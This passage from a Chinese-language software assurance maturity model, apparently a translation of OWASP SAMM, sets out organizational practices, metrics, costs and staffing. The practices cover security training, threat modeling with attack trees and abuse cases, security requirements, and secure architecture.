✦大多数的人员 是否为安全开发 进行了测试以保 证达到要求的最 低技能底线? 结果 ✦提高了开发人 员对最常见的代 码级问题的安全 意识; ✦使用基本的安 全最佳实践来维 护软件; ✦为技术人员设 定了安全操作的 基准; ✦根据基准安全 知识,启用定性安 全检查。 ✦全程关注导致 产品、设计和代码 级安全漏洞的问 题; ✦制定现行项目 中漏洞和设计缺 陷的补救计划; ✦在需求、设计和 开发阶段,启用定 性安全检查点; ✦对安全问题的 深入了解,鼓励更 主动的安全计划。 ✦有效地补救正 在进行项目代码 和旧版项目代码 中的漏洞; ✦快速了解和抑 制新的攻击和威 胁; ✦判断员工对安 全问题的认知度, 并根据通用标准 进行评估; ✦为提高安全意 识,制定公平的激 励制度。 43 教育与指导 EG1 为开发人员提供关于以安全编程和部署为主题的资源 措施 A. 实施技术安全意识的培训 采用来自组织内部或者外部的资源,对技术人员进 行应用程序安全性基本原则的安全培训。通常,培训可 通过两种方式进行:讲师讲授1-2天的培训课程;或者 是基于计算机的培训课程,让每位开发人员以等量的学 时学习各个方面的内容。 课程内容应包含概念和技术两方面的信息。适当的 主题包括:关于高级别最佳实例的输入验证、输出编码、 错误处理、日志记录、身份验证、授权。其他的培训内 容还应包含普遍的软件漏洞,如在OWASP Top 10中列 举的软件(Web应用程序、嵌入式设备、客户端与服务 器应用程序、后端事务处理系统等)的常见漏洞。在可 能的情况下,提供以特定编程语言编写的代码示例以及 机房上机练习。 开始进行这种培训时,建议强制进行年度安全培训, 然后根据开发人员的人数进行授课(讲师授课或基于电 脑的课程)。 B. 建立并维护技术指导 对于开发人员,收集并建立一个列表以包含有效的 文件、网页和技术文档,用于提供特定于技术的安全建 议。这些参考资料可以来自于互联网上许多可用的公开 资源。如果开发环境中涉及到许多非常专业的技术或专 利技术,可由熟悉安全问题的资深员工编写安全记录, 并以一种专门的方式来创建知识库。 确保管理层了解了相关资源,并为员工介绍了其预 期的用途。尽量简化指导,并及时更新参考列表,以避 免混乱和不相关的内容。一旦建立了一种熟悉的等级后, 技术参考资料可用作定性的检查表,以确保在开发过程 中被阅读、理解并遵循。 结果 ✦提高了开发人员对 最常见的代码级问题 的安全意识; ✦使用基本的安全最 佳实践来维护软件; ✦为技术人员设定了 安全操作的基准; ✦ 根据基准安全知 识,启用定性安全检 查。 成功指标 ✦>50%的开发人员在 过去1年内大概了解 了安全问题; ✦>75%的高级开发人 员和架构师在过去1 年内大概了解了安全 问题; ✦在首次培训的3个 月内,启动技术指导。 成本 ✦培训课程的扩充或 许可; ✦对技术指导的持续 维护。 人员 ✦开发人员(1-2天/ 年) ✦架构师(1-2天/ 年) 相关等级 ✦政策与遵守-2 ✦安全需求-1 ✦安全架构-1 44 教育与指导 EG2 为软件生命周期中所有的人员提供基于角色的安全开发详细指导 措施 A. 实施针对特定角色的应用程序安全培训 对那些工作职能强调应用程序安全性的员工进行 安全培训。通常,培训可通过两种方式进行:一种是讲 师讲授1-2天的培训课程;另一种是计算机模块化的培 训,每人利用等量的学时学习各个模块内容。 对于管理人员和需求规划人员而言,课程内容应着 重讲述安全需求规划、漏洞和事件管理、威胁建模、误 用/滥用案例设计。 针对测试人员和审核人员的培训,应着重培训员工 识别和更高效地分析软件有无安全问题。同样,这类课 程应着重讲述代码审查、体系结构和设计分析、运行时 分析和高效安全测试规划。 扩展针对开发人员和架构师的技术培训,将其他相 关主题纳入其中,例如:安全设计模式、特定于工具的 培训、威胁模型和软件评估技术。首次进行这种培训时, 建议每年进行一次安全意识培训,并定期进行专门主题 的培训。应根据每种角色的员工人数,按需要提供培训 (讲师授课或基于计算机的培训)。 B. 聘用安全指导专家增强项目团队 聘用组织内部或外部的安全专家加入项目团队,以 提供相关咨询。另外,应在组织内部公告安全专家的入 职,以确保所有员工对此知晓。 安全专家可以在组织内部招募有经验的员工,通过 让他们投入一些时间(最多10%)以进行安全指导。为 提高效率,这些专家们应通过相互交流来确保他们了解 彼此之间的专长,并将问题传递给相应的人员。 在软件生命周期中的任何时候都可能需要安全专 家,需要这些安全专家的合适时候包括:产品的初步概 念定义时、在完成功能或详细设计规范之前、开发过程 中出现问题时、测试计划时、发生操作安全事故时。 随着时间的推移,指导资源的内部网络既可作为在 整个组织内沟通与安全相关信息的联络点,也可作为比 纯粹集中式安全团队更熟悉当前项目团队的本地资源。 结果 ✦全程关注导致产品、设 计和代码级安全漏洞的问 题; ✦制定现行项目中漏洞和 设计缺陷的补救计划; ✦在需求、设计和开发阶 段,启用定性安全检查点; ✦对安全问题的深入了 解,鼓励更主动的安全计 划。 额外成功指标 ✦>60%的开发人员在过去 1年内接受了培训; ✦>50%的管理人员和分析 师在过去1年内接受了培 训; ✦>80%的高级开发人员和 架构师在过去1年内接受 了培训; ✦培训课程的有用性值> 3.0 Likert。 额外成本 ✦培训库的扩充或许可; ✦深谙安全知识的员工的 实际训练。 额外人员 ✦开发人员(2天/年) ✦架构师(2天/年) ✦经理(1-2天/年) ✦业务拥有者(1-2天/ 年) ✦QA测试员(1-2天/年) ✦安全审计员(1-2天/ 年) 相关等级 ✦漏洞管理-1 ✦代码审核-2 ✦安全架构-2 45 教育与指导 EG3 实施综合的安全培训,并为员工进行基本知识的认证检验 措施 A. 建立正式的应用程序安全支持门户网站 在与应用程序安全性相关主题的书面资源的基础 上,创建并公布一个集中式存储库(通常是一个内部网 站)。可以用对组织有意义的任何方式创建指导准则, 但是,必须要建立一个批准委员会和简明的变更控制流 程。 除了最佳实践列表、特定于工具的指南、常见问题 解答和其他文章等形式的静态内容以外,支持门户网站 还应具有交互组件,比如:邮件列表、基于Web的论坛 或wiki网页,以使内部资源交流与安全相关的主题并对信 息进行分类,以备日后参考。 门户网站的内容应进行归类,以便根据一些常用的 要素(比如:平台、编程语言、与特定第三方库或框架 的相关性、生命周期阶段等)轻松地搜索。开发软件的 项目团队应在产品开发早期就遵守他们应当遵循的特定 准则。在产品评估阶段,适用的准则列表和与产品相关 的讨论应当用作审计标准。 B. 建立基于角色的考试或认证制度 按角色或按培训班级/模块来创建并管理能力考试, 以测试员工对安全知识的理解和利用情况。一般说来, 应在基于角色的课程的基础上设立考试,并将最低通过 分数设置在75%左右。虽然要求员工必须每年参加适当的 培训或进修课程,但认证考试应至少每半年进行一次。 根据是否通过标准或例外绩效,应将员工分成不同 等级。当有其他与安全相关的活动时,可要求已达到某 个认证级别的个人,在实践完成之前结束该活动。比如, 一个未通过认证的开发人员在未获得架构师认证的明确 批准前,无法将设计付诸实施。这就为每个项目提供了 更为细致的可视性,以通过个人责任来跟踪安全决策。 从整体上看,这还为做出有关应用程序安全性的业务决 策而奖惩员工奠定了基础。 结果 ✦有效地补救正在进 行项目代码和旧版项 目代码中的漏洞; ✦快速了解和抑制新 的攻击和威胁; ✦判断员工对安全问 题的认知度,并根据 通用标准进行评估; ✦为提高安全意识, 制定公平的激励制 度。 额外成功指标 ✦>80%的员工在过去 1年内获得了认证。 额外成本 ✦认证考试的扩充或 许可; ✦对应用程序安全支 持门户网站的持续维 护和变更控制; ✦执行员工认证的人 力资源和成本耗费。 额外人员 ✦开发人员(1天/年) ✦架构师(1天/年) ✦经理(1天/年) ✦业务拥有者(1天/ 年) ✦QA测试员(1天/ 年) ✦安全审计员(1天/ 年) 相关等级 ✦策略与遵守-2&3 46 威胁评估 TA1 TA2 TA3 目标 确定并了解组织 和单个项目的高 级别威胁。 提高威胁评估的 准确性,并深入了 解每个项目的细 节。 将补偿控制与对 内部和第三方软 件的每个威胁具 体联系起来。 措施 A. 建立并维护特 定应用程序的 威胁模型; B. 根据软件架构 建立攻击者概 况。 A. 建立并维护每 个项目的滥用 用例模型; B. 为威胁的度量 采用一个权重 系统。 A. 明确评估来自 第三方组件的 风险; B. 用补偿控制详 细描述威胁模 型。 评估 ✦组织中的大多 数项目是否考虑 并记录可能的威 胁? ✦组织是否了解 并记录可能面对 的攻击者类型? ✦项目团队是否 定期为可能的滥 用分析功能需 求? ✦项目团队是否 为相关比较使用 了一个威胁等级 评定方法? ✦利益相关者是 否意识到相关的 威胁和等级评 定? ✦项目团队是否 具体考虑了来自 外部软件的风 险? ✦所有的保护机 制和控制是否能 捕获并匹配威 胁? 结果 ✦对可能产生负 面结果的因素,有 了深入的理解; ✦在项目团队中 加强了对威胁的 安全意识; ✦为组织记录了 威胁。 ✦为每个项目详 细了解了可能的 威胁; ✦为项目团队能 更好得权衡决定 的框架; ✦根据风险的权 重,项目团队能对 开发工作进行优 先级排序的能力。 ✦更深入的考虑 对于每个软件项 目的全部威胁概 况; ✦详细的映射保 证功能,以建立对 每个软件项目的 威胁; ✦根据每个软件 项目的业务功能, 建立文档以记录 调查的对象。 47 威胁评估 TA1 确定并了解组织和单个项目的高级别威胁 措施 A. 建立并维护特定应用程序的威胁模型 根据每个软件项目的商业目的和商业风险(如果存在的 话),确定每个项目团队在软件开发过程中可能的最坏情况。 这可以通过简单的攻击树或者通过更正式的威胁建模方法 实现,例如:微软的STRIDE,Trike等。 为建立攻击树模型,需用一句话描述每个最坏的情况, 并将它们作为一个攻击者的高级目标标记出来。通过每个确 定的攻击者目标,可以确定必须的先决条件,以便得以实现 每个目标。这些信息应该在每个目标下面的分支中被捕获, 每个分支下面的描述为逻辑与或者是逻辑或。一个“与”分 支表明每个直接连接的子节点必须为真,以便实现父节点。 一个“或”分行表明任意一个连接的子节点可为真,以便实 现父节点。 除了威胁建模方法,还需审核每个当前和历史的功能要 求,并扩展攻击树来表明每个相关的安全问题。反复地仔细 研究攻击者可能达到的任何一个目标,分析每个错误情况的 所有方式。当完成初步建立后,且软件有了明显的更改时, 应用程序的威胁模型应该更新。这一评估过程应由高级开发 人员和架构师以及一个或多个安全审计人员进行实施。 B. 根据软件架构建立攻击者概况 最初,根据软件项目进行评估,以确定对组织可能的威 胁。对于这种评估,可能仅考虑了来自于攻击者有害意图的 有限威胁,而忽略了其他的风险,比如:已知的威胁漏洞、 潜在的弱点等。 根据普遍考虑到的外部攻击者和他们相关的攻击动机 来设计。这个列表中,增加可能导致破坏的内部角色和内部 攻击者的动机。基于正在考虑中的软件项目架构,它可以对 每次一种架构类型进行更加有效的分析,而不是分析每个单 独的项目中应用程序架构和业务目的都会受到类似的威胁。 因为相同架构和业务目的的应用程序通常容易受到相同的 攻击。 这一评估应由业务所有者和其他利益相关者执行,但也 需要包括一个或多个安全审计员,以获得对威胁的更多了 解。最后的目标是拥有一个简洁的威胁攻击者名单列表和相 应的攻击动机。 结果 ✦对可能产生负 面结果的因素,有 了深入的理解; ✦在项目团队中 加强了对威胁的 安全意识; ✦为组织记录了 威胁。 成功指标 ✦>50%的项目利 益相关者在过去 12个月内对相关 项目的威胁模型 有大概了解; ✦>75%的项目利 益相关者对相关 架构的攻击者概 况有大致了解。 成本 ✦建立并维护项 目的威胁模型。 人员 ✦业务拥有者(1 天/年) ✦开发人员(1天/ 年) ✦架构师(1天/ 年) ✦安全审计员(2 天/年) ✦经理(1天/年) 相关等级 ✦策略与指标-1 ✦安全需求-2 48 威胁评估 TA2 提高威胁评估的准确性,并深入了解每个项目的细节 活动 A. 建立并维护每个项目的滥用用例模型 进一步考虑组织的威胁,执行更正式的分析,以确定潜 在的误用或滥用功能。通常,这一过程开始于正常使用情况 的确定,比如:用例图。 如果没有使用正式的滥用实例建模技术,则使用常规的 方法产生一个陈述,并以集思广益的方式决定陈述是否应该 部分或者全部否定,从而为每种情况产生一组滥用实例。最 简单的开始方法是以尽可能多的方式将“不”字插入在陈 述之中,通常在名词和动词附近。每个使用情况应该产生一 些可能被滥用的实例陈述。 进一步阐述滥用实例的陈述,以包括任何特定应用软件 关注的业务功能。最终目标是为了完成滥用陈述,以形成一 个软件不允许发生情况的模型。如果需要,这些滥用实例可 以与现有的威胁模型相结合。 初步建立完成以后,滥用实例模型应该为新启动的项目 在设计阶段更新。对于已有的项目,应为潜在的滥用分析新 的需求,并应当为已建立的实际功能创建滥用实例。 B. 为威胁的度量采用一个权重系统 根据已创建的攻击概况,确定一个评级系统,以对威胁 进行相对得比较。这个系统可以包含基于业务风险简单的高 -中-低等级。但是,任何类型的度量方法都可以使用,只 要其中所分的等级不超过5个。 确定评级系统后,应建立评估标准,并为每一个威胁分 配一个等级。为了正确地进行该步骤,应在评级以前考虑威 胁的各种其他重要因素。这些因素包括:资本和人力资源、 内在的访问权限、技术能力、威胁模型的有关目标和攻击成 功的可能性等。 为每一个威胁分配了一个等级后,优先考虑使用在开发 生命周期中降低风险的措施。一旦为项目团队建立系统以 后,应在新功能的设计或重构过程中予以更新。 结果 ✦为每个项目详 细了解了可能的 威胁; ✦为项目团队能 更好得权衡决定 的框架; ✦根据风险的权 重,项目团队能对 开发工作进行优 先级排序的能力。 额外的成功指标 ✦>75%的项目团 队确定并为威胁 排序; ✦>75%的项目利 益相关者在过去6 个月里大概了解 了相关项目的威 胁和滥用模型。 额外成本 ✦建立并维护威 胁模型和攻击者 概况的项目成本。 额外人员 ✦安全审计员(1 天/年) ✦业务拥有者(1 天/年) ✦经理(1天/年) 相关等级 ✦策略与指标-2 ✦安全架构-2 49 威胁评估 TA3 将补偿控制与对内部和第三方软件的每个威胁具体联系起来 活动 A. 明确评估来自第三方组件的风险 对组织开发的软件进行基于代码的评估,并确定任何 来自于外部的组件。通常情况下,这包括了开源项目、购 买现有的软件和组织开发的软件使用的在线服务。 对于每一个确定的组成部分,基于被攻破的潜在第三 方部件,为软件项目详细描述攻击者概述。根据新确定的 攻击者概述,并基于新攻击者的目的和能力,更新软件的 威胁模型,以合并包含其他可能的风险。 除了威胁实例,还应当考虑可能影响你代码和设计的 第三方软件威胁或者设计漏洞。根据来自威胁的潜在风险 和已更新的攻击者概述的信息,详细描述你的威胁模型。 完成项目的最初进行后,必须在设计阶段或者每一个 开发周期中更新并审核。这项活动应该由一个具备相关技 术的安全审计员和业务利益相关者执行。 B. 用补偿控制详细描述威胁模型 执行评估,以正式确定威胁模型中能成功直接阻止攻 击的前提条件因素。这些因素是正式解决来自软件直接风 险的补偿性控制,也可以是软件本身的技术特点,还可以 是在开发生命周期、基础设施功能等中的过程元素。 如果使用攻击树模型,每个分支所代表的逻辑关系可 能是“与”或者“或”中的任意一个。因此,在一个“与” 分支中通过减少一个前提条件,父节点和所有连接的叶节 点可以被标记以作为减少。然而,在一个“或”节点的所 有子节点必须防止在父节点以前被标记以作为减少。 除了威胁建模技术以外,确定补偿控制并直接批注威 胁模型。其目标就控制而言,确定可被最大化标记数目的 补偿控制。对于任何剩余可行的路径,需要确定反馈到组 织策略中的潜在补偿控制。 在项目的最初执行后,这必须在设计阶段或每一个开 发周期中更新和审核。这项活动应该由一个具备相关技术 安全审计员和业务利益相关者执行。 结果 ✦更深入的考虑对于 每个软件项目的全部 威胁概况; ✦详细的映射保证功 能,以建立对每个软件 项目的威胁; ✦根据每个软件项目 的业务功能,建立文档 以记录调查的对象。 额外的成功指标 ✦>80%的项目团队在 每一个执行周期以前 更新了威胁模型; ✦>80%的项目团队在 每次发布以前更新了 第三方组件的目录清 单; ✦>50%的所有安全事 件在过去的12个月里 由威胁模型提前检验 出来。 额外成本 ✦来自维护详细威胁 模型和扩展攻击者概 述的项目成本。 ✦发现所有的第三方 附属物。 额外人员 ✦业务拥有者(1天/ 年) ✦开发人员(1天/年) ✦架构师(1天/年) ✦安全审计员(2天/ 年) ✦经理(1天/年) 相关等级 ✦安全需求-2&3 50 安全需求 SR1 SR2 SR3 目标 在软件需求分析 阶段明确地将安 全考虑在内。 根据业务逻辑和 已知风险增加安 全需求的深度。 为所有软件项目 和第三方的附属 项目强制要求安 全需求。 措施 A. 从业务功能推 导出安全需 求; B. 为需求评估安 全和遵守指 导。 A. 为资源和能力 建立一个访问 控制矩阵; B. 根据已知风险 指定安全需 求。 A. 将安全需求写 入供应商协议 中; B. 为安全需求扩 展审计计划。 评估 ✦大多数项目团 队在开发过程中 是否明确阐述的 一些安全需求? ✦项目团队是否 从最佳实例和遵 守的指导中引导 需求? ✦大多数的业务 拥有者是否审核 相关项目的访问 控制矩阵? ✦项目团队是否 根据来自于其他 安全活动的反馈 来详细阐述需 求? ✦大多数的业务 拥有者是否为安 全需求审核厂商 的协议? ✦项目团队描述 的安全需求是否 被审计? 结果 ✦开发工作和业 务风险高度一致; ✦专门为安全需 求获得行业中的 最佳实例; ✦利益相关者对 于采取为降低来 自软件风险的措 施的意识。 ✦详细了解对于 业务逻辑的攻击 实例; ✦根据可能遭受 的攻击,对安全功 能的开发工作设 置优先级; ✦为特点和安全 工作间的权衡,做 出更有理论依据 的决策; ✦利益相关者可 以更好地避免存 在安全漏洞的功 能要求。 ✦为安全期望正 式从外部代码设 定基线; ✦每个项目团队 集中使用的安全 措施信息; ✦根据应用程序 风险和所需安全 需求,调整项目资 源。 51 安全需求 SR1 在软件需求分析阶段明确地将安全考虑在内 措施 A. 从业务功能推导出安全需求 对指明的业务逻辑和每个软件项目总体行为的功能需 求进行审核。在收集了项目需求后,进行评估,以获得相 关的安全需求。即使软件将由第三方完成,这些需求一旦 确定,应包含在功能需求中交付给厂商。 对于每个功能需求,安全审计员应带领利益相关者了 解过程中涉及到安全方面的期望。通常情况下,澄清每个 需求的问题包括了对于数据安全、访问控制、处理的完整 性、业务功能的关键性、职责分离、运行时间等的期望。 确保所有安全需求,在总体上为编写出好的需求而保 持相同原则,是很重要的。具体来说,这些安全需求应该 是具体的、可测量的、合理的。 为所有正在进行项目中的新需求进行这项处理。对于 已有的功能,建议进行同样的处理以作为一个为将来安全 重构的差距分析。 B. 为需求评估安全和遵守指导 确定业界的最佳实践,以作为项目团队的需求。这些 最佳实践可以从公开的指导准则、内部或外部的指导准则/ 标准/政策、已建立的遵守需求中选择。 重要的是,不要尝试在每一个开发迭代过程中引入太 多的最佳实践需求,因为需要对于设计和编程有一个时间 权衡。建议的方法是在连续的开发周期中逐渐地增加最佳 实践,以增强软件整体的安全保证。 对于现有的系统,重构安全最佳实践会是一个复杂的 任务。如有可能机会,在添加新的特征时增加安全需求。 至少,应当执行分析,以确定适用的最佳实践,从而帮助 未来的项目规划。 这项审核工作应当由一个安全审计员和业务利益相关 者执行。而高级开发人员、架构师和其他技术利益相关者 也应当将他们的设计和编程知识经验带入到决策过程之 中。 结果 ✦开发工作和业务风 险高度一致; ✦专门为安全需求获 得行业中的最佳实例; ✦利益相关者对于采 取为降低来自软件风 险的措施的意识。 成功指标 ✦>50%的项目团队有 明确定义了的安全需 求。 成本 ✦来自每个开发周期 额外安全需求的项目 成本。 人员 ✦安全审计员(2天/ 年) ✦业务拥有者(1天/ 年) ✦经理(1天/年) ✦架构师(1天/年) 相关等级 ✦教育与指导-1 ✦政策与遵守-2 ✦设计审核-1 ✦代码审核-1 ✦安全测试-1 52 安全需求 SR2 根据业务逻辑和已知风险增加安全需求的深度 措施 A. 为资源和能力建立一个访问控制矩阵 根据应用程序的业务目的,确定用户和操作人员角色。 此外,通过收集所有的有关数据资产和应用程序的特点, 建立资源和能力列表,以保护任何形式的访问控制。 在一个以角色作为其中一个轴并以资源作为另外一个 轴的简单矩阵中,考虑每种角色和每种资源的关系,并注 意就访问控制而言,在每个交叉点上的正确行为。 需要注意的是,对于数据资源,访问权限是指创建、 读取、更新和删除。对于资源的访问功能,访问权限分级 很可能会是应用程序特定的,但至少注意,角色应允许使 用这些功能。 此权限矩阵将作为一个为全部系统业务逻辑记录正确 访问控制权限的产生物。就这点而言,它应由项目团队和 业务利益相关者共同建立。经过初步建立,它应当由业务 利益相关者在每次发布前进行更新,但通常是在设计阶段 将要开始的时候进行。 B. 根据已知风险指定安全需求 明确审核现有表明特定于组织或具体项目的安全风险 的对象,以便更好地了解该软件的整体风险概况。如果可 以的话,利用以下资源:高层次的业务风险;私有的应用 程序威胁模型;来自设计审核、代码审核、安全测试的结 果等等。 除了审核现有的对象以外,为一个应用程序使用滥用 实例模型,以确定模型的具体安全需求,直接或间接地促 进减少滥用的情况。 这个过程应该由业务拥有者和安全审计员共同执行。 最终,由风险概念导致的新安全需求,成为规划阶段内建 的步骤,使新发现的风险专门由项目团队评估。 结果 ✦详细了解对于业务 逻辑的攻击实例; ✦根据可能遭受的攻 击,对安全功能的开发 工作设置优先级; ✦为特点和安全工作 间的权衡,做出更有理 论依据的决策; ✦利益相关者可以更 好地避免存在安全漏 洞的功能要求。 额外成功指标 ✦>75%的项目在过去 6个月里更新了滥用实 例模型。 额外成本 ✦来自建立和维护滥 用实例模型的项目开 支。 额外人员 ✦安全审计员(2天/ 年) ✦经理(1天/年) ✦架构师(1天/年) ✦业务拥有者(1天/ 年) 相关等级 ✦威胁评估-1&3 ✦策略与指标-1 53 安全需求 SR3 要求对所有软件项目和第三方附属物的安全需要处理 措施 A. 将安全需求写入供应商协议中 除了在前面的分析中已确定的各种安全需求外,还可 以从第三方协议中获得其他的安全利益。通常情况下,在 组织内部开发需求和可能的高层次设计,而详细的设计和 编程执行则交给供应商完成。 由于每个外部开发的组成部分的具体分工不同,需要 确定具体的安全措施和技术评估标准,以添加在供应商的 合同中。通常,这是一组包含了“设计审核”“代码审核” “安全测试”实践的措施。 协议内容的修改应该是与供应商对每个实例逐一修 改,因为添加额外的需求往往意味着成本的增加。每个潜 在安全活动的成本,应该与每个组件的使用活动或者考虑 到的系统的利益相权衡。 B. 为安全需求扩展审计计划 将安全需求完整性的检查纳入常规项目审计之中。由 于在没有项目具体知识信息的情况下很难判断,审计应专 注于检查项目的对象,比如需求或设计文档,以作为执行 了适当种类分析的证据。 特别是,每一个功能需求,应用基于业务驱动力和期 望的滥用实例的安全需求注明。整个项目需求应包含从最 佳实践的指导和标准得到的一个需求列表。此外,应该还 有一个明确的未完成的安全需求列表,以及一个未来版本 公布的时间估计表。 这项审计应在每个开发迭代中进行,理想的情况是在 需求处理快完成时结束,但必须在软件发布以前完成审计。 结果 ✦为安全期望正式从 外部代码设定基线; ✦每个项目团队集中 使用的安全措施信息; ✦根据应用程序风险 和所需安全需求,调整 项目资源。 额外成功指标 ✦>80%的项目在过去 6个月里通过了安全需 求审计; ✦>80%的供应商协议 在过去12个月里为合 同的安全需求进行了 分析。 额外成本 ✦因安全需求增加而 增加的软件外包成本; ✦因安全需求的发行 关卡造成的当前项目。 额外人员 ✦安全审计员(2天/ 年) ✦经理(2天/年) ✦业务拥有者(1天/ 年) 相关等级 ✦威胁评估-3 ✦政策与遵守-2 54 安全架构 SA1 SA2 SA3 目标 将主动安全指导 的想法引入到软 件设计过程中。 将软件设计过程 引导向已知安全 服务和默认安全 设计。 正式控制软件设 计过程并验证安 全部件的使用。 措施 A. 维护推荐的软 件框架列表; B. 将安全原则明 确运用到设计 中。 A. 明确并促进安 全服务和基础 设施; B. 明确来自架构 的安全设计模 式。 A. 建立正式的参 照架构和平 台; B. 验证框架、模 式和平台的使 用。 评估 ✦项目团队是否 提供一个推荐的 第三方部件列 表? ✦大多数的项目 团队是否意识到 安全设计原则并 应用它们? ✦您是否为项目 团队宣传可共享 的安全服务? ✦项目团队是否 提供了基于应用 程序架构的规范 设计模式? ✦项目团队是否 从中央控制平台 和框架建立软 件? ✦项目团队是否 为安全架构部分 的使用进行审 计? 结果 ✦专门防止意外 的依赖性和选择 一次性实现; ✦利益相关者意 识到因选择的文 档和框架而增加 的项目风险; ✦为将安全机制 积极得应用到设 计中,而在开发过 程中建立协议。 ✦将资产详细地 映射到用户角色, 以鼓励在设计时 更好的区分; ✦为提供安全保 证和功能,而可重 复使用的设计模 块; ✦使用已建立的 安全设计技术,以 增加对软件项目 的信心。 ✦自定义的应用 程序开发平台,以 提供内置的安全 保护; ✦整个组织都期 望在开发过程中 针对安全做出更 积极的努力; ✦根据业务需要, 利益相关者可以 为安全设计做出 更好的权衡决定。 55 安全架构 SA1 将主动安全指导的想法引入到软件设计过程中 措施 A. 维护推荐的软件框架列表 在整个组织内贯穿软件项目,确定正在使用的常用第 三方软件库和框架。一般来说,这种需要不是对于依赖软 件组件的详尽搜索,而是为了获得最常用的高级别组件。 根据第三方组件的核心特点,从部件列表将这些组件 分为不同的功能组。此外,注意到跨越项目团队的每个组 件的普遍使用情况, 以权衡第三方代码的信赖度。使用此 加权列表作为指导,创建一个组件清单,以宣传作为开发 组织的推荐组件。 对于推荐列表中包含的内容,有几个决定因素。虽然 列表可以不进行专门研究就可创建列表,但是我们建议, 调查每个事件的历史、跟踪记录漏洞响应、对组织而言功 能的适当性、第三方组件使用的复杂性等等。 这份列表应由高级开发人员和架构师创建,但还应包 括经理和安全审计员的介入。创建后,这个满足功能分组 的推荐组件列表应当向开发组织进行宣传。最终目标是为 项目团队提供为人熟知的默认资源。 B. 将安全原则明确运用到设计中 在设计过程中,项目团队的技术人员应当使用一个简 短的安全指导原则列表,作为系统详细设计的核对表。通 常情况下,安全原则包括深度防御、最薄弱环节的保护、 安全功能的简单设计、安全故障、安全性和实用性的平衡、 最低权限的使用、模糊安全的避免等。 特别是在边缘界面,设计团队应当考虑整个系统范围 中的每一项原则,并确定可添加在每个这样的界面上的特 点,以加强安全性。一般来说,这些应该受到限制,使其 只需在功能要求常规实现成本之外做出少量额外工作,其 他较大的工作量应在未来发布中提及并规划。 这个过程应该在安全意识培训后,由每个项目团队执 行,这有助于和更加安全、精明的工作人员进行合作,以 作出设计决定。 结果 ✦专门防止意外的依 赖性和选择一次性实 现; ✦利益相关者意识到 因选择的文档和框架 而增加的项目风险; ✦为将安全机制积极 得应用到设计中,而在 开发过程中建立协议。 额外成功指标 ✦>80%的开发人员在 过去1年里大概了解了 软件框架建议; ✦>50%的项目设计了 安全原则的自我报告 应用。 额外成本 ✦对软件框架建议的 建立、维护和了解; ✦项目对安全原则的 持续分析和应用。 额外人员 ✦架构师(2-4天/年) ✦开发人员(2-4天/ 年) ✦安全审计员(2-4 天/年) ✦经理(2天/年) 相关等级 ✦教育与指导-1 56 安全架构 SA2 将软件设计过程引导向已知安全服务和默认安全设计 措施 A. 明确并促进安全服务和基础设施 组织应当确定与安全功能相关的共享基础设施或服 务。这通常包括:单点登录服务、企业目录系统、访问控 制或有权限的服务、身份验证系统。通过收集和评估可重 复使用的系统,建立这种资源的清单,并根据系统履行的 安全机制将它们分类。这也有助于考虑为什么一个开发团 队想要整合这种资源,比如:使用共享资源的好处。 如果每个类别中存在多种资源,一个组织应该在该类 别中选择并规范化一个或多个类别的共享服务。由于未来 软件的开发将依赖于这些选择的服务,每项服务都应该进 行彻底地审计,以确保理解了安全态势的底线。对于每个 选定的服务,应由开发团队建立设计指导,以了解如何与 系统集成。这种指导在集成后,应当向开发团队提供培训、 指导、指导方针和标准。 这样做的好处包括:促进已知的安全系统、简化项目 设计团队的安全指导、为围绕使用共享安全服务的应用程 序建立保证并明确方向。 B. 明确来自架构的安全设计模式 就常用架构类型而言,组织中的每个软件项目都应该 被归类。常见的类别包括:客户服务器应用程序、嵌入式 系统、桌面应用程序、面向Web的应用程序、Web服务平 台、事务处理中间件系统、主机应用程序等。根据组织的 专业性,可能需要根据开发语言、处理器架构、甚至部署 的时间安排,做出更详细的分类。 对于普通的软件架构类型,可衍生出一系列代表执行 安全功能可靠方法的常用设计模式,并应用到组织软件项 目的每个设计之中。这些安全设计模式代表可研究或购买 的通用设计元素,如果这些自定义的模式根据你的组织要 求更加具体,它通常会更有效。示例模式包括:单点登录 子系统、跨层代表模型、加强的界面设计、职能分离授权 模型、集中化的日志模式等。 由架构师、高级开发人员和其他技术利益相关者,在 设计阶段确定适用的和适当的身份验证工作模式。 结果 ✦将资产详细地映射 到用户角色,以鼓励在 设计时更好的区分; ✦为提供安全保证和 功能,而可重复使用的 设计模块; ✦使用已建立的安全 设计技术,以增加对软 件项目的信心。 额外成功指标 ✦>80%的项目在过去 6个月里更新了访问权 限矩阵; ✦>80%的项目团队在 过去6个月里大概了解 了应用程序的安全模 式。 额外成本 ✦扩充或者许可应用 程序安全模;。 ✦持续维护项目的访 问权限矩阵。 额外人员 ✦架构师(2-4天/年) ✦开发人员(1-2天/ 年) ✦经理(1-2天/年) ✦业务拥有者(1天/ 年) ✦安全审计员(1-2 天/年) 相关等级 ✦教育与指导-1 57 安全架构 SA3 正式控制软件设计过程并验证安全部件的使用 措施 A. 建立正式的参照架构和平台 当与共享的安全服务集成、并使用每种架构具体的安 全模式后,项目团队应选择一组执行这些功能的代码集, 以作为一个共享代码库的基础。这些共享的基本代码最初 可作为每个项目都需使用的一组普遍推荐库集合,它可以 随着时间的推移,发展成为一个或多个软件架构,以代表 项目团队建立他们自己软件的参考平台。参考平台的示例 包括: Web应用程序视图控制器架构、支持事务处理的 后端系统库文件、Web服务平台框架、客户端服务器应用 程序框架、中间件的可插拔业务逻辑框架等。 另一种建立初始参考平台的方法是在生命周期的早期 选择一个特定的项目,并让安全人员使用该生命周期,以 一个通用的方式建立安全功能,以便从项目中提取该功能 并利用到该组织的其他项目中。 不管采用什么样的建立方式,参照平台在审计和与安 全相关的审核的速度方面有优势,并可以提高开发效率, 降低维护费用。 架构师、高级开发人员和其他技术利益相关者应参与 设计和建立参照平台。创建后,必须有一个团队对其进行 持续的维护和更新。 B. 验证框架、模式和平台的使用 在项目的例行审计中,需要对项目工件进行额外分析, 以衡量推荐框架、设计模式、共享的安全服务以及引用参 考平台的使用情况。虽然在例行审计中进行,这一活动的 目的是尽可能多地从项目团队中收集反馈信息,以衡量他 们各自积极的安全工作。 总体而言,在项目团队中验证几个因素是很重要的。 确定非推荐框架的使用,以确定在推荐框架与该组织的功 能需求之间是否存在差异。检查未使用或不正确使用的设 计模式和引用参考平台模块,以确定是否需要更新。另外, 随着组织的发展,项目团队希望看到在引用参考平台上执 行更多不同的功能。 这项分析由任何具有安全常识的技术人员执行。而收 集的度量标准,则由经理和利益相关者从每个项目分析整 理。 结果 ✦自定义的应用程序 开发平台,以提供内置 的安全保护; 